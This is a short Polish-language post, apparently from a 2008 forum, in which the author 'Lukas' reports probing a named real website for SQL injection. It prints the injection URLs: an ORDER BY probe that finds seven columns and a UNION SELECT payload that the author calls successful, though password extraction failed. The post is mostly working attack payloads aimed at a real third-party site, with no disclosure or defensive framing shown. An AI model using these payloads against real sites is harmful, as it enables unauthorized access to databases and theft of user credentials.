Lukas
Data publikacji:
14:14, 9 June 2008
Sprawdziłem podatność i iloć kolumn:
http://www.iq-test.pl/?pid=10+AND+1=0+ORDER+BY+7--
przy ORDER BY 8 wyskakuje błąd więc kolumn jest 7
Atak przz UNION SELECT
http://www.iq-test.pl/?pid=10+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7--
Atak przez UNION SELECT udany, brak możliwości wyciągnięcia haseł (nieznane nazwy kolumn, brak INFORMATION_SCHEMA)